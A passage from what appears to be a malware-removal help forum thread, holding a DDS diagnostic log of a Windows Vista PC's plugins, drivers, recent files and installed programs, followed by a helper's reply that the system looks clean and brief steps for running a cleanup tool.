    AppInit_DLLs: c:\windows\system32\guard32.dll
    SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL

    ================= FIREFOX ===================

    FF - ProfilePath - c:\users\lennon\appdata\roaming\mozilla\firefox\profiles\bigxufq1.default\
    FF - prefs.js: browser.startup.homepage - hxxp://www.google.ie/
    FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
    FF - plugin: c:\program files\google\update\1.2.145.5\npGoogleOneClick8.dll
    FF - plugin: c:\program files\google\update\1.2.183.13\npGoogleOneClick8.dll
    FF - plugin: c:\program files\google\update\1.2.183.7\npGoogleOneClick8.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npFoxitReaderPlugin.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\NPOFFICE.DLL
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin2.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin3.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin4.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin5.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin6.dll
    FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin7.dll
    FF - plugin: c:\program files\opera\program\plugins\np_gp.dll
    FF - plugin: c:\program files\opera\program\plugins\npFoxitReaderPlugin.dll
    FF - plugin: c:\program files\opera\program\plugins\nppl3260.dll
    FF - plugin: c:\program files\opera\program\plugins\nprpjplug.dll
    FF - plugin: c:\users\lennon\appdata\local\google\update\1.2.183.13\npGoogleOneClick8.dll
    FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\dotnetassistantextension\
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}

    ---- FIREFOX POLICIES ----
    c:\program files\mozilla firefox\greprefs\security-prefs.js - pref("security.ssl3.rsa_seed_sha", true);

    ============= SERVICES / DRIVERS ===============

    R1 cmdGuard;COMODO Firewall Pro Sandbox Driver;c:\windows\system32\drivers\cmdguard.sys [2008-8-7 128376]
    R1 cmdHlp;COMODO Firewall Pro Helper Driver;c:\windows\system32\drivers\cmdhlp.sys [2008-8-7 29520]
    R1 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2009-6-18 142832]
    R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2009-11-11 9968]
    R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2009-11-11 74480]
    R2 AERTFilters;Andrea RT Filters Service;c:\windows\system32\AERTSrv.exe [2007-12-5 77824]
    R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-3-16 180224]
    R2 postgresql-8.3;PostgreSQL Server 8.3;C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N "postgresql-8.3" -D "C:/Program Files/PostgreSQL/8.3/data" -w --> C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe runservice -N

    postgresql-8.3 [?]
    R3 MpNWMon;Microsoft Malware Protection Network Driver;c:\windows\system32\drivers\MpNWMon.sys [2009-6-18 42480]
    R3 NmPar;MosChip PCI Parallel Port;c:\windows\system32\drivers\NmPar.sys [2006-12-19 81408]
    R3 SASENUM;SASENUM;c:\program files\superantispyware\SASENUM.SYS [2009-11-11 7408]
    S2 gupdate1c9e852b942f080;Google Update Service (gupdate1c9e852b942f080);c:\program files\google\update\GoogleUpdate.exe [2009-6-8 133104]
    S3 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-5-29 21504]
    S3 IntelDH;IntelDH Driver;c:\windows\system32\drivers\IntelDH.sys [2008-4-24 5632]
    S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [2008-5-21 34576]
    S3 PSI;PSI;c:\windows\system32\drivers\psi_mf.sys [2009-6-17 12648]

    =============== Created Last 30 ================

    2009-11-29 20:11:39 0 d
    w- C:\Rooter$
    2009-11-28 18:49:16 0 d
    w- c:\programdata\TrueCrypt
    2009-11-25 03:01:53 2048 ----a-w- c:\windows\system32\tzres.dll
    2009-11-25 02:58:38 1401856 ----a-w- c:\windows\system32\msxml6.dll
    2009-11-25 02:58:37 1248768 ----a-w- c:\windows\system32\msxml3.dll
    2009-11-25 02:58:35 714240 ----a-w- c:\windows\system32\timedate.cpl
    2009-11-20 15:42:41 0 d
    w- c:\users\lennon\appdata\roaming\Malwarebytes
    2009-11-20 15:42:36 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
    2009-11-20 15:42:35 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
    2009-11-20 15:42:35 0 d
    w- c:\programdata\Malwarebytes
    2009-11-20 15:42:35 0 d
    w- c:\program files\Malwarebytes' Anti-Malware
    2009-11-20 15:36:57 0 d
    w- c:\programdata\SUPERAntiSpyware.com
    2009-11-20 15:36:46 0 d
    w- c:\users\lennon\appdata\roaming\SUPERAntiSpyware.com
    2009-11-20 15:36:46 0 d
    w- c:\program files\SUPERAntiSpyware
    2009-11-20 02:40:08 0 d
    w- c:\program files\MakeMKV
    2009-11-11 09:40:51 2036736 ----a-w- c:\windows\system32\win32k.sys
    2009-11-11 09:38:52 355328 ----a-w- c:\windows\system32\WSDApi.dll
    2009-11-07 15:52:37 0 d
    w- c:\programdata\XHEO INC
    2009-11-04 14:32:36 0 d
    w- c:\program files\Windows Portable Devices
    2009-11-04 14:32:29 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdMtpDr_01_07_00.Wdf
    2009-11-04 14:31:57 0 ---ha-w- c:\windows\system32\drivers\Msft_User_WpdFs_01_07_00.Wdf
    2009-11-04 14:29:49 81920 ----a-w- c:\windows\system32\wpdbusenum.dll
    2009-11-04 14:28:48 4096 ----a-w- c:\windows\system32\oleaccrc.dll
    2009-11-04 14:28:48 234496 ----a-w- c:\windows\system32\oleacc.dll
    2009-11-04 14:28:47 555520 ----a-w- c:\windows\system32\UIAutomationCore.dll
    2009-11-04 13:06:07 1638912 ----a-w- c:\windows\system32\mshtml.tlb
    2009-11-03 19:53:49 0 d
    w- c:\program files\iPod
    2009-11-03 19:53:48 0 d
    w- c:\program files\iTunes
    2009-11-01 14:27:40 0 d
    w- C:\962431762f6499d25e8db0e08e090e
    2009-10-31 14:17:13 0 d
    w- C:\5cc8389e2cb2f2f5fc5f494a07
    2009-10-31 03:47:16 0 d
    w- c:\program files\MyDefrag v4.2.4

    ==================== Find3M ====================

    2009-11-28 18:49:13 223440 ----a-w- c:\windows\system32\drivers\truecrypt.sys
    2009-11-26 15:34:35 171552 ----a-w- c:\windows\system32\guard32.dll
    2009-11-26 15:34:29 128376 ----a-w- c:\windows\system32\drivers\cmdguard.sys
    2009-11-22 16:35:22 29520 ----a-w- c:\windows\system32\drivers\cmdhlp.sys
    2009-11-08 01:24:26 411368 ----a-w- c:\windows\system32\deploytk.dll
    2009-11-04 14:32:33 665600 ----a-w- c:\windows\inf\drvindex.dat
    2009-11-04 14:32:33 51200 ----a-w- c:\windows\inf\infpub.dat
    2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstrng.dat
    2009-11-04 14:32:32 143360 ----a-w- c:\windows\inf\infstor.dat
    2009-11-02 20:42:06 195456
    w- c:\windows\system32\MpSigStub.exe
    2009-10-03 19:01:00 85504 ----a-w- c:\windows\system32\ff_vfw.dll
    2009-10-01 01:02:17 2537472 ----a-w- c:\windows\system32\wpdshext.dll
    2009-10-01 01:02:05 30208 ----a-w- c:\windows\system32\WPDShextAutoplay.exe
    2009-10-01 01:02:04 334848 ----a-w- c:\windows\system32\PortableDeviceApi.dll
    2009-10-01 01:02:02 87552 ----a-w- c:\windows\system32\WPDShServiceObj.dll
    2009-10-01 01:02:00 31232 ----a-w- c:\windows\system32\BthMtpContextHandler.dll
    2009-10-01 01:01:59 546816 ----a-w- c:\windows\system32\wpd_ci.dll
    2009-10-01 01:01:59 160256 ----a-w- c:\windows\system32\PortableDeviceTypes.dll
    2009-10-01 01:01:56 60928 ----a-w- c:\windows\system32\PortableDeviceConnectApi.dll
    2009-10-01 01:01:56 350208 ----a-w- c:\windows\system32\WPDSp.dll
    2009-10-01 01:01:56 196608 ----a-w- c:\windows\system32\PortableDeviceWMDRM.dll
    2009-10-01 01:01:56 100864 ----a-w- c:\windows\system32\PortableDeviceClassExtension.dll
    2009-10-01 01:01:54 40448 ----a-w- c:\windows\system32\drivers\WpdUsb.sys
    2009-10-01 01:01:50 226816 ----a-w- c:\windows\system32\WpdMtp.dll
    2009-10-01 01:01:49 61952 ----a-w- c:\windows\system32\WpdMtpUS.dll
    2009-10-01 01:01:49 33280 ----a-w- c:\windows\system32\WpdConns.dll
    2009-09-25 02:10:10 974848 ----a-w- c:\windows\system32\WindowsCodecs.dll
    2009-09-25 02:07:08 189440 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
    2009-09-25 02:04:32 321024 ----a-w- c:\windows\system32\PhotoMetadataHandler.dll
    2009-09-25 01:49:22 1554432 ----a-w- c:\windows\system32\xpsservices.dll
    2009-09-25 01:48:08 351232 ----a-w- c:\windows\system32\XpsPrint.dll
    2009-09-25 01:38:29 847360 ----a-w- c:\windows\system32\OpcServices.dll
    2009-09-25 01:36:13 280064 ----a-w- c:\windows\system32\XpsGdiConverter.dll
    2009-09-25 01:35:31 135680 ----a-w- c:\windows\system32\XpsRasterService.dll
    2009-09-25 01:33:25 195584 ----a-w- c:\windows\system32\dxdiagn.dll
    2009-09-25 01:33:15 829440 ----a-w- c:\windows\system32\d3d10warp.dll
    2009-09-25 01:33:01 369664 ----a-w- c:\windows\system32\WMPhoto.dll
    2009-09-25 01:32:59 252928 ----a-w- c:\windows\system32\dxdiag.exe
    2009-09-25 01:31:53 519680 ----a-w- c:\windows\system32\d3d11.dll
    2009-09-25 01:31:26 486912 ----a-w- c:\windows\system32\d3d10level9.dll
    2009-09-25 01:31:21 161280 ----a-w- c:\windows\system32\d3d10_1.dll
    2009-09-25 01:31:19 218112 ----a-w- c:\windows\system32\d3d10_1core.dll
    2009-09-25 01:31:16 1030144 ----a-w- c:\windows\system32\d3d10.dll
    2009-09-25 01:31:15 828928 ----a-w- c:\windows\system32\d2d1.dll
    2009-09-25 01:30:23 481792 ----a-w- c:\windows\system32\dxgi.dll
    2009-09-25 01:30:23 190464 ----a-w- c:\windows\system32\d3d10core.dll
    2009-09-25 01:27:04 793088 ----a-w- c:\windows\system32\FntCache.dll
    2009-09-25 01:27:04 37888 ----a-w- c:\windows\system32\cdd.dll
    2009-09-25 01:27:04 1064448 ----a-w- c:\windows\system32\DWrite.dll
    2009-09-24 22:54:55 258048 ----a-w- c:\windows\system32\winspool.drv
    2009-09-24 22:54:53 667648 ----a-w- c:\windows\system32\printfilterpipelinesvc.exe
    2009-09-24 22:54:52 26112 ----a-w- c:\windows\system32\printfilterpipelineprxy.dll
    2009-09-10 16:48:01 218624 ----a-w- c:\windows\system32\msv1_0.dll
    2009-09-10 14:59:26 8147456 ----a-w- c:\windows\system32\wmploc.DLL
    2009-09-10 14:58:28 310784 ----a-w- c:\windows\system32\unregmp2.exe
    2009-09-10 02:01:02 3023360 ----a-w- c:\windows\system32\UIRibbon.dll
    2009-09-10 02:00:54 1164800 ----a-w- c:\windows\system32\UIRibbonRes.dll
    2009-09-10 02:00:36 92672 ----a-w- c:\windows\system32\UIAnimation.dll
    2009-09-04 11:41:59 60928 ----a-w- c:\windows\system32\msasn1.dll
    2009-08-21 06:16:20 44 ---h--w- c:\program files\232e4158.tmp
    2008-05-29 15:00:50 174 --sha-w- c:\program files\desktop.ini
    2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfd.dat
    2006-11-02 12:42:02 30674 ----a-w- c:\windows\inf\perflib\0409\perfc.dat
    2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfi.dat
    2006-11-02 12:42:02 287440 ----a-w- c:\windows\inf\perflib\0409\perfh.dat
    2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfi.dat
    2006-11-02 09:20:21 287440 ----a-w- c:\windows\inf\perflib\0000\perfh.dat
    2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfd.dat
    2006-11-02 09:20:19 30674 ----a-w- c:\windows\inf\perflib\0000\perfc.dat
    2008-04-25 01:28:53 8192 --sha-w- c:\windows\users\default\NTUSER.DAT

    ============= FINISH: 0:11:11.35 ===============




    UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
    IF REQUESTED, ZIP IT UP & ATTACH IT

    DDS (Ver_09-11-29.01)

    Microsoft® Windows Vista™ Home Premium
    Boot Device: \Device\HarddiskVolume3
    Install Date: 24/04/2008 18:43:02
    System Uptime: 29/11/2009 18:22:41 (6 hours ago)

    Motherboard: Dell Inc. | | 0RY007
    Processor: Intel(R) Core(TM)2 Duo CPU E6550 @ 2.33GHz | Socket 775 | 1998/333mhz

    ==== Disk Partitions =========================

    C: is FIXED (NTFS) - 239 GiB total, 92.672 GiB free.
    D: is FIXED (NTFS) - 10 GiB total, 5.788 GiB free.
    E: is CDROM ()
    F: is Removable
    G: is Removable
    H: is Removable
    I: is Removable

    ==== Disabled Device Manager Items =============

    ==== System Restore Points ===================

    RP796: 24/11/2009 04:50:47 - Scheduled Checkpoint
    RP797: 24/11/2009 13:20:44 - Windows Update
    RP798: 25/11/2009 02:17:47 - Scheduled Checkpoint
    RP799: 25/11/2009 03:01:09 - Windows Update
    RP800: 26/11/2009 15:37:20 - Windows Update
    RP801: 27/11/2009 13:33:27 - Scheduled Checkpoint
    RP802: 27/11/2009 21:42:39 - Windows Update
    RP803: 28/11/2009 06:26:03 - Windows Update
    RP804: 28/11/2009 18:43:10 - Installed Opera 10.10.
    RP806: 28/11/2009 18:48:58 - TrueCrypt installation
    RP807: 29/11/2009 18:34:07 - Windows Update

    ==== Installed Programs ======================

    7-Zip 4.65
    AC3Filter 1.62b
    Adobe Flash Player 10 ActiveX
    Adobe Flash Player 10 Plugin
    AoA Audio Extractor 1.0
    Apple Application Support
    Apple Mobile Device Support
    Apple Software Update
    ATI Catalyst Install Manager
    AutoHotkey 1.0.48.03
    AviSynth 2.5
    Betfair Poker
    Betsafe Poker
    Blue Face Network Tester
    Bonjour
    Browser Address Error Redirector
    bwin Poker
    CarbonPoker
    Catalyst Control Center - Branding
    Catalyst Control Center Core Implementation
    Catalyst Control Center Graphics Full Existing
    Catalyst Control Center Graphics Full New
    Catalyst Control Center Graphics Light
    Catalyst Control Center Graphics Previews Common
    Catalyst Control Center Graphics Previews Vista
    Catalyst Control Center HydraVision Full
    Catalyst Control Center InstallProxy
    Catalyst Control Center Localization All
    ccc-core-static
    ccc-utility
    CCC Help Chinese Standard
    CCC Help Chinese Traditional
    CCC Help English
    CCC Help Japanese
    CCC Help Korean
    CCC Help Thai
    CDPoker
    COMODO Firewall Pro
    Compatibility Pack for the 2007 Office system
    Dell Getting Started Guide
    Dell Support Center
    DellSupport
    Eraser
    Everest Poker (Remove Only)
    FastStone Image Viewer 3.9
    ffdshow [rev 3094] [2009-10-03]
    FileHippo.com Update Checker
    Foxit Reader
    Gnuf.com Poker
    Google Chrome
    Google Earth
    Google Update Helper
    GrabIt 1.7.2 Beta 4 (build 997)
    Haali Media Splitter
    HijackThis 2.0.2
    Holdem Manager
    HollywoodPoker.com
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
    Intel(R) Network Connections 13.5.32.0
    IrfanView (remove only)
    iTunes
    Java(TM) 6 Update 17
    JGoodies JDiskReport 1.3.1
    KeePass Password Safe 1.16
    Ladbrokes Poker
    Littlewoods Poker
    MakeMKV v1.4.8_beta
    Malwarebytes' Anti-Malware
    MansionPoker
    Media Player Classic - Home Cinema v. 1.3.1249.0
    MediaInfo 0.7.25
    MeGUI (remove only)
    Microsoft .NET Framework 3.5 SP1
    Microsoft Antimalware
    Microsoft Application Error Reporting
    Microsoft Choice Guard
    Microsoft Office PowerPoint Viewer 2007 (English)
    Microsoft Office Professional Edition 2003
    Microsoft Security Essentials
    Microsoft Silverlight
    Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
    Microsoft Visual C++ 2005 Redistributable
    Microsoft Works
    mkv2vob
    MKVtoolnix 2.9.8
    MobileMe Control Panel
    MosChip Multi-IO Controller
    Mozilla Firefox (3.5)
    Mozilla Firefox (3.5.5)
    Mozilla Thunderbird (2.0.0.19)
    Mozilla Thunderbird (2.0.0.23)
    MSVCRT
    MSXML 4.0 SP2 (KB936181)
    MSXML 4.0 SP2 (KB941833)
    MSXML 4.0 SP2 (KB954430)
    MSXML 4.0 SP2 (KB973688)
    MyDefrag v4.2.4
    Noble Poker
    Notepad++
    OGA Notifier 2.0.0048.0
    Opera 10.10
    Pacific Poker
    PartyPoker
    PingPlotter Standard 3.30.0s
    Poker
    Poker 770
    PokerStars
    PokerStove version 1.21
    PostgreSQL 8.3
    Psi (remove only)
    Purple Lounge
    QuickPar 0.9
    QuickTime
    Real Alternative 2.0.1 Lite
    Realtek High Definition Audio Driver
    RedKings Poker
    Roxio Creator Audio
    Roxio Creator Copy
    Roxio Creator Data
    Roxio Creator DE
    Roxio Creator Tools
    Roxio Express Labeler 3
    Roxio Update Manager
    SABnzbd (remove only)
    SeaMonkey (2.0)
    Secunia PSI
    Shareaza 2.5.0.0
    Skins
    SopCast 3.2.4
    SUPERAntiSpyware Free Edition
    Titan Poker
    Tower Gaming
    TrueCrypt
    TVAnts 1.0
    TVersity Codec Pack 1.2
    TVersity Media Server 1.7.2.1 Beta
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
    User's Guides
    VLC media player 1.0.3
    Winamp
    Windows Live Call
    Windows Live Communications Platform
    Windows Live Essentials
    Windows Live Messenger
    Windows Live Sign-in Assistant
    Windows Live Upload Tool
    WinPcap 4.1 beta4
    WinSCP 4.1.9

    ==== Event Viewer Messages From Past Week ========

    29/11/2009 05:04:12, Error: Service Control Manager [7034] - The COMODO Internet Security Helper

    Service service terminated unexpectedly. It has done this 1 time(s).
    28/11/2009 16:39:27, Error: Service Control Manager [7000] - The SASDIFSV service failed to

    start due to the following error: Cannot create a file when that file already exists.
    28/11/2009 05:29:09, Error: Ntfs [137] - The default transaction resource manager on volume S:

    encountered a non-retryable error and could not start. The data contains the error code.

    ==== End Of File ===========================


  • Closed Accounts Posts: 1,970 ✭✭✭ActorSeeksJob


    looks fine, I wouldn't worry

    • Download OTC to your desktop and run it
    • Click Yes to beginning the Cleanup process and remove these components, including this application.
    • You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.


  • Closed Accounts Posts: 5,017 ✭✭✭tsue921i8wljb3


    Thanks ASJ, I hope I can speak for others here when I say that we really appreciate the work you do in this forum.


Advertisement